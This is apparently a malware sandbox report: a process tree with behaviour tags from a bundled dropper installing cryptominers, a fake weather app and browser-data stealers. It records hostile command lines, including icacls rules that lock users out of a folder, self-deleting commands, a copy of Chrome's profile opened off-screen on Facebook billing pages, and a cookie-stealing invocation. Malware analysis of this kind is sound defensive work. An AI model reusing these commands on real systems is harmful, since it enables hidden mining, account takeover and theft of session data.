- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:7972
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\elxh3ono.qbl\app.exe /8-2222 & exit15⤵PID:1856
C:\Users\Admin\AppData\Local\Temp\elxh3ono.qbl\app.exeC:\Users\Admin\AppData\Local\Temp\elxh3ono.qbl\app.exe /8-222216⤵PID:8704
C:\Users\Admin\AppData\Local\Temp\elxh3ono.qbl\app.exe"C:\Users\Admin\AppData\Local\Temp\elxh3ono.qbl\app.exe" /8-222217⤵PID:5404
C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\Raw4vpn.exe"C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\Raw4vpn.exe"11⤵
- Executes dropped EXE
PID:6692
C:\Windows\SysWOW64\dllhost.exe"C:\Windows\System32\dllhost.exe"12⤵PID:4984
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\Windows\System32\cmd.exe < Congiunte.vstx12⤵PID:6384
C:\Windows\SysWOW64\cmd.exeC:\Windows\System32\cmd.exe13⤵PID:7124
C:\Windows\SysWOW64\findstr.exefindstr /V /R "^vwjMyTzhxjHATonkmcjOlJMtCRUiLDSlcOLAlCdfhnxfouvyjMTUesyNfophYkCRzbtybXwXyWALgvWvcPVYKYirIYkwzrswWDWKw$" Tue.vstx14⤵PID:4356
C:\Users\Admin\AppData\Roaming\llYHlSDJxbwekicZbE\Infinita.exe.comInfinita.exe.com x14⤵PID:3692
C:\Users\Admin\AppData\Roaming\llYHlSDJxbwekicZbE\Infinita.exe.comC:\Users\Admin\AppData\Roaming\llYHlSDJxbwekicZbE\Infinita.exe.com x15⤵
- Suspicious use of SetThreadContext
PID:6760
C:\Users\Admin\AppData\Roaming\llYHlSDJxbwekicZbE\RegAsm.exeC:\Users\Admin\AppData\Roaming\llYHlSDJxbwekicZbE\RegAsm.exe16⤵
- System policy modification
PID:5656
C:\Users\Admin\Videos\xmrmin.exe"C:\Users\Admin\Videos\xmrmin.exe"17⤵
- Adds Run key to start application
PID:5612
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"18⤵PID:4140
C:\Users\Admin\AppData\Local\Temp\PULServices.exe"C:\Users\Admin\AppData\Local\Temp\PULServices.exe"18⤵
- Adds Run key to start application
PID:4936
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"19⤵PID:6732
C:\Users\Admin\AppData\Local\Temp\PULServices.exe"C:\Users\Admin\AppData\Local\Temp\PULServices.exe"20⤵
- Adds Run key to start application
PID:416
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"21⤵PID:2980
C:\Users\Admin\AppData\Local\Temp\PULServices.exe"C:\Users\Admin\AppData\Local\Temp\PULServices.exe"22⤵
- Adds Run key to start application
PID:11048
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"23⤵PID:10708
C:\Users\Admin\Videos\ethminer.exe"C:\Users\Admin\Videos\ethminer.exe"17⤵
- Adds Run key to start application
PID:8088
C:\Users\Admin\AppData\Roaming\Microsoft\inc\sihost32.exe"C:\Users\Admin\AppData\Roaming\Microsoft\inc\sihost32.exe"18⤵PID:7656
C:\Users\Admin\AppData\Local\Temp\WUFServices.exe"C:\Users\Admin\AppData\Local\Temp\WUFServices.exe"18⤵PID:6264
C:\Users\Admin\AppData\Roaming\Microsoft\inc\sihost32.exe"C:\Users\Admin\AppData\Roaming\Microsoft\inc\sihost32.exe"19⤵PID:5748
C:\Users\Admin\AppData\Local\Temp\WUFServices.exe"C:\Users\Admin\AppData\Local\Temp\WUFServices.exe"20⤵
- Adds Run key to start application
PID:5852
C:\Users\Admin\AppData\Roaming\Microsoft\inc\sihost32.exe"C:\Users\Admin\AppData\Roaming\Microsoft\inc\sihost32.exe"21⤵PID:6940
C:\Users\Admin\AppData\Local\Temp\WUFServices.exe"C:\Users\Admin\AppData\Local\Temp\WUFServices.exe"22⤵
- Adds Run key to start application
PID:11180
C:\Users\Admin\AppData\Roaming\Microsoft\inc\sihost32.exe"C:\Users\Admin\AppData\Roaming\Microsoft\inc\sihost32.exe"23⤵PID:8624
C:\Users\Admin\Videos\111.exe"C:\Users\Admin\Videos\111.exe"17⤵
- Suspicious use of SetThreadContext
PID:5076
C:\Users\Admin\Videos\111.exe"C:\Users\Admin\Videos\111.exe"18⤵PID:9144
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Users\Admin\AppData\Roaming\Mxmetamux" /inheritance:e /deny "*S-1-1-0:(R,REA,RA,RD)" & icacls "C:\Users\Admin\AppData\Roaming\Mxmetamux" /inheritance:e /deny "*S-1-5-7:(R,REA,RA,RD)" & icacls "C:\Users\Admin\AppData\Roaming\Mxmetamux" /inheritance:e /deny "Admin:(R,REA,RA,RD)"19⤵PID:8596
C:\Windows\SysWOW64\icacls.exeicacls "C:\Users\Admin\AppData\Roaming\Mxmetamux" /inheritance:e /deny "*S-1-1-0:(R,REA,RA,RD)"20⤵
- Modifies file permissions
PID:8628
C:\Windows\SysWOW64\icacls.exeicacls "C:\Users\Admin\AppData\Roaming\Mxmetamux" /inheritance:e /deny "*S-1-5-7:(R,REA,RA,RD)"20⤵
- Modifies file permissions
PID:8308
C:\Windows\SysWOW64\icacls.exeicacls "C:\Users\Admin\AppData\Roaming\Mxmetamux" /inheritance:e /deny "Admin:(R,REA,RA,RD)"20⤵
- Modifies file permissions
PID:5272
C:\Users\Admin\Videos\Vickybuild.exe"C:\Users\Admin\Videos\Vickybuild.exe"17⤵PID:5740
C:\Windows\SysWOW64\dllhost.exe"C:\Windows\System32\dllhost.exe"18⤵PID:7712
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\Windows\System32\cmd.exe < Scossa.vstm18⤵PID:7132
C:\Windows\SysWOW64\cmd.exeC:\Windows\System32\cmd.exe19⤵PID:7048
C:\Windows\SysWOW64\findstr.exefindstr /V /R "^HKdDyBsKVRbIzDdBnSQuCmYpqTntMrWuEDHOlRJZUbTYFtiQycxTtRjoMuCjejYRUdtQWCdGpQkyFZEWMIZdIreMdnwtfbXHmwtgZdUDtNJhFiDMBFmxhHoQgsAbAjsLTDGDVfW$" Ambo.vstm20⤵PID:2420
C:\Users\Admin\AppData\Roaming\NGKOKqxkeVXzSRiBG\Cio.exe.comCio.exe.com V20⤵PID:7652
C:\Users\Admin\AppData\Roaming\NGKOKqxkeVXzSRiBG\Cio.exe.comC:\Users\Admin\AppData\Roaming\NGKOKqxkeVXzSRiBG\Cio.exe.com V21⤵
- Suspicious use of SetThreadContext
PID:7940
C:\Users\Admin\AppData\Roaming\NGKOKqxkeVXzSRiBG\RegAsm.exeC:\Users\Admin\AppData\Roaming\NGKOKqxkeVXzSRiBG\RegAsm.exe22⤵PID:2172
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 3020⤵
- Runs ping.exe
PID:5864
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Remove.bat" 5656 C:\Users\Admin\AppData\Roaming\llYHlSDJxbwekicZbE\RegAsm.exe"17⤵PID:1052
C:\Windows\SysWOW64\taskkill.exetaskkill /F /PID 565618⤵
- Kills process with taskkill
PID:8068
C:\Windows\SysWOW64\choice.exechoice /C Y /N /D Y /T 318⤵PID:7052
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 3014⤵
- Runs ping.exe
PID:5148
C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\XOoRXgN90WGr.exe"C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\XOoRXgN90WGr.exe"11⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:6676
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe12⤵PID:4608
C:\Users\Admin\AppData\Local\Temp\rmkokh5ohda\app.exe"C:\Users\Admin\AppData\Local\Temp\rmkokh5ohda\app.exe" /8-238⤵
- Executes dropped EXE
PID:5252
C:\Users\Admin\AppData\Local\Temp\rmkokh5ohda\app.exe"C:\Users\Admin\AppData\Local\Temp\rmkokh5ohda\app.exe" /8-239⤵
- Executes dropped EXE
- Loads dropped DLL
- Modifies data under HKEY_USERS
PID:6812
C:\Users\Admin\AppData\Local\Temp\1gmztt5tnve\qvquqcfcme2.exe"C:\Users\Admin\AppData\Local\Temp\1gmztt5tnve\qvquqcfcme2.exe"8⤵PID:5288
C:\Windows\SysWOW64\cmd.execmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\1gmztt5tnve\qvquqcfcme2.exe"9⤵PID:5768
C:\Windows\SysWOW64\PING.EXEping 1.1.1.1 -n 1 -w 300010⤵
- Runs ping.exe
PID:5804
C:\Users\Admin\AppData\Local\Temp\jhociknne2b\zjqs2pkwltw.exe"C:\Users\Admin\AppData\Local\Temp\jhociknne2b\zjqs2pkwltw.exe" /quiet SILENT=1 AF=7568⤵
- Executes dropped EXE
- Loads dropped DLL
- Enumerates connected drives
- Modifies system certificate store
- Suspicious use of FindShellTrayWindow
PID:5408
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\Weather\Weather 1.0.0\install\FD7DF1F\Weather Installation.msi" /quiet SILENT=1 AF=756 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\jhociknne2b\zjqs2pkwltw.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\jhociknne2b\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1617727997 /quiet SILENT=1 AF=756 " AF="756" AI_CONTROL_VISUAL_STYLE="16578540;16578540;14988840;12422912"9⤵PID:6256
C:\Users\Admin\AppData\Local\Temp\tobfuwd1z1l\setup_10.2_us3.exe"C:\Users\Admin\AppData\Local\Temp\tobfuwd1z1l\setup_10.2_us3.exe" /silent8⤵
- Drops file in Program Files directory
PID:4408
C:\Users\Admin\AppData\Local\Temp\V225T2ZIS8\setups.exe"C:\Users\Admin\AppData\Local\Temp\V225T2ZIS8\setups.exe" ll5⤵
- Executes dropped EXE
PID:4272
C:\Users\Admin\AppData\Local\Temp\is-18NV8.tmp\setups.tmp"C:\Users\Admin\AppData\Local\Temp\is-18NV8.tmp\setups.tmp" /SL5="$30294,1873631,71168,C:\Users\Admin\AppData\Local\Temp\V225T2ZIS8\setups.exe" ll6⤵
- Executes dropped EXE
- Checks computer location settings
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
PID:4056
C:\Users\Admin\AppData\Local\Temp\RarSFX1\Full Version.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX1\Full Version.exe"4⤵
- Executes dropped EXE
- Drops file in Program Files directory
PID:4788
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Program Files\unins0000.vbs"5⤵PID:4668
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" "C:\Program Files\unins0000.dll",install6⤵PID:4232
C:\Users\Admin\AppData\Local\Temp\RarSFX1\askinstall20.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX1\askinstall20.exe"4⤵
- Executes dropped EXE
- Drops Chrome extension
- Suspicious use of AdjustPrivilegeToken
PID:4744
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe5⤵PID:4184
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4232
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe6⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4040
C:\Windows\SysWOW64\xcopy.exexcopy "C:\Users\Admin\AppData\Local\Google\Chrome\User Data" "C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99\" /s /e /y5⤵
- Enumerates system info in registry
PID:2608
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --window-position=-50000,-50000 --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" https://www.facebook.com/ https://www.facebook.com/pages/ https://secure.facebook.com/ads/manager/account_settings/account_billing/5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
PID:5976
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler --user-data-dir=C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99 /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99\Crashpad --metrics-dir=C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99 --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=86.0.4240.111 --initial-client-data=0xd4,0xd8,0xdc,0xb0,0xe0,0x7ff909f96e00,0x7ff909f96e10,0x7ff909f96e206⤵PID:5988
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1604,8515702305111504614,16651408814091408878,131072 --lang=en-US --service-sandbox-type=utility --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --mojo-platform-channel-handle=2188 /prefetch:86⤵PID:5480
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1604,8515702305111504614,16651408814091408878,131072 --lang=en-US --service-sandbox-type=network --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --mojo-platform-channel-handle=1664 /prefetch:86⤵
- Suspicious behavior: EnumeratesProcesses
PID:4328
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1604,8515702305111504614,16651408814091408878,131072 --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1616 /prefetch:26⤵PID:496
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1604,8515702305111504614,16651408814091408878,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2540 /prefetch:16⤵PID:5564
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1604,8515702305111504614,16651408814091408878,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2856 /prefetch:16⤵PID:5360
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1604,8515702305111504614,16651408814091408878,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3304 /prefetch:16⤵PID:5768
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1604,8515702305111504614,16651408814091408878,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3588 /prefetch:16⤵PID:2172
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1604,8515702305111504614,16651408814091408878,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3180 /prefetch:16⤵PID:5788
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1604,8515702305111504614,16651408814091408878,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3956 /prefetch:16⤵PID:6180
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1604,8515702305111504614,16651408814091408878,131072 --lang=en-US --service-sandbox-type=utility --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --mojo-platform-channel-handle=4244 /prefetch:86⤵PID:7236
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1604,8515702305111504614,16651408814091408878,131072 --disable-gpu-compositing --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1936 /prefetch:16⤵PID:6120
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1604,8515702305111504614,16651408814091408878,131072 --disable-gpu-compositing --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4064 /prefetch:16⤵PID:5176
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1604,8515702305111504614,16651408814091408878,131072 --disable-gpu-compositing --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5880 /prefetch:16⤵PID:7392
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1604,8515702305111504614,16651408814091408878,131072 --lang=en-US --service-sandbox-type=utility --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --mojo-platform-channel-handle=6048 /prefetch:86⤵PID:7852
C:\Users\Admin\AppData\Local\Temp\RarSFX1\file.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX1\file.exe"4⤵PID:6236
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX1\file.exe" >> NUL5⤵PID:6868
C:\Windows\SysWOW64\PING.EXEping 127.0.0.16⤵
- Runs ping.exe
PID:6916
C:\Users\Admin\AppData\Local\Temp\RarSFX1\md2_2efs.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX1\md2_2efs.exe"4⤵
- Executes dropped EXE
- Checks whether UAC is enabled
PID:6956
C:\Users\Admin\AppData\Local\Temp\RarSFX1\BTRSetp.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX1\BTRSetp.exe"4⤵
- Checks computer location settings
PID:7444
C:\ProgramData\7340319.exe"C:\ProgramData\7340319.exe"5⤵PID:3952
C:\ProgramData\1072282.exe"C:\ProgramData\1072282.exe"5⤵
- Adds Run key to start application
PID:936
C:\ProgramData\Windows Host\Windows Host.exe"C:\ProgramData\Windows Host\Windows Host.exe"6⤵PID:7592
C:\ProgramData\5241308.exe"C:\ProgramData\5241308.exe"5⤵
- Suspicious use of SetThreadContext
PID:5244
C:\ProgramData\5241308.exe"{path}"6⤵PID:4392
C:\ProgramData\415333.exe"C:\ProgramData\415333.exe"5⤵PID:5476
C:\Users\Admin\AppData\Local\Temp\RarSFX1\gcttt.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX1\gcttt.exe"4⤵PID:5608
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt5⤵PID:7664
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt5⤵
- Executes dropped EXE
- Drops file in System32 directory
- Drops file in Program Files directory
- Drops file in Windows directory
- Checks SCSI registry key(s)
- Modifies system certificate store
PID:7036
-
-
-
-
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:788
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵
- Modifies Internet Explorer settings
PID:4704
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
PID:3160
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies Internet Explorer settings
- Modifies registry class
PID:2672
-
C:\Windows\System32\DataExchangeHost.exeC:\Windows\System32\DataExchangeHost.exe -Embedding1⤵PID:5536
-
[1] C:\Windows\system32\msiexec.exe  PID 5872
    cmdline: C:\Windows\system32\msiexec.exe /V
    - Enumerates connected drives
    - Drops file in Windows directory
  [2] C:\Windows\syswow64\MsiExec.exe  PID 5944
      cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding 5BC660DC8E08B4015187509DCF22B102 C
      - Loads dropped DLL
  [2] C:\Windows\syswow64\MsiExec.exe  PID 6684
      cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding 3E46A51CD43D9E390B7AAE3351A70DB0
      - Blocklisted process makes network request
      - Loads dropped DLL
  [2] C:\Users\Admin\AppData\Roaming\Weather\Weather\prerequisites\aipackagechainer.exe  PID 7096
      cmdline: "C:\Users\Admin\AppData\Roaming\Weather\Weather\prerequisites\aipackagechainer.exe"
      - Adds Run key to start application
      - Drops file in Windows directory
    [3] C:\Users\Admin\AppData\Roaming\Weather\Weather\prerequisites\RequiredApplication_1\Weather_Installation.exe  PID 6372
        cmdline: "C:\Users\Admin\AppData\Roaming\Weather\Weather\prerequisites\RequiredApplication_1\Weather_Installation.exe" -silent=1 -AF=756 -BF=default -uncf=default
        - Adds Run key to start application
      [4] C:\Users\Admin\AppData\Roaming\Weather\Weather.exe  PID 644
          cmdline: "C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" "--anbfs"
          - Checks computer location settings
          - Suspicious use of SendNotifyMessage
        [5] C:\Users\Admin\AppData\Roaming\Weather\Weather.exe  PID 5164
            cmdline: C:\Users\Admin\AppData\Roaming\Weather\Weather.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Weather\User Data"  /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Weather\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Weather\User Data" --annotation=plat=Win64 --annotation=prod=Weather --annotation=ver=0.0.2 --initial-client-data=0x1e0,0x1e4,0x1e8,0x1b0,0x1ec,0x7ff90b4a9ec0,0x7ff90b4a9ed0,0x7ff90b4a9ee0
        [5] C:\Users\Admin\AppData\Roaming\Weather\Weather.exe  PID 5656
            cmdline: "C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=gpu-process --field-trial-handle=1660,4809384303783889108,17331893310845126710,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw644_1917249224" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1680 /prefetch:2
        [5] C:\Users\Admin\AppData\Roaming\Weather\Weather.exe  PID 7512
            cmdline: "C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1660,4809384303783889108,17331893310845126710,131072 --lang=en-US --service-sandbox-type=network --no-sandbox --enable-audio-service-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw644_1917249224" --mojo-platform-channel-handle=1728 /prefetch:8
            - Modifies system certificate store
        [5] C:\Users\Admin\AppData\Roaming\Weather\Weather.exe  PID 8044
            cmdline: "C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1660,4809384303783889108,17331893310845126710,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --enable-audio-service-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw644_1917249224" --mojo-platform-channel-handle=2152 /prefetch:8
            - Checks whether UAC is enabled
        [5] C:\Users\Admin\AppData\Roaming\Weather\Weather.exe  PID 6564
            cmdline: "C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Weather\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1660,4809384303783889108,17331893310845126710,131072 --disable-gpu-compositing --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw644_1917249224" --nwjs --extension-process --enable-auto-reload --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --mojo-platform-channel-handle=2600 /prefetch:1
            - Checks computer location settings
        [5] C:\Users\Admin\AppData\Roaming\Weather\Weather.exe  PID 7440
            cmdline: "C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1660,4809384303783889108,17331893310845126710,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --enable-audio-service-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw644_1917249224" --mojo-platform-channel-handle=3100 /prefetch:8
            - Checks processor information in registry
        [5] C:\Users\Admin\AppData\Roaming\Weather\Weather.exe  PID 6284
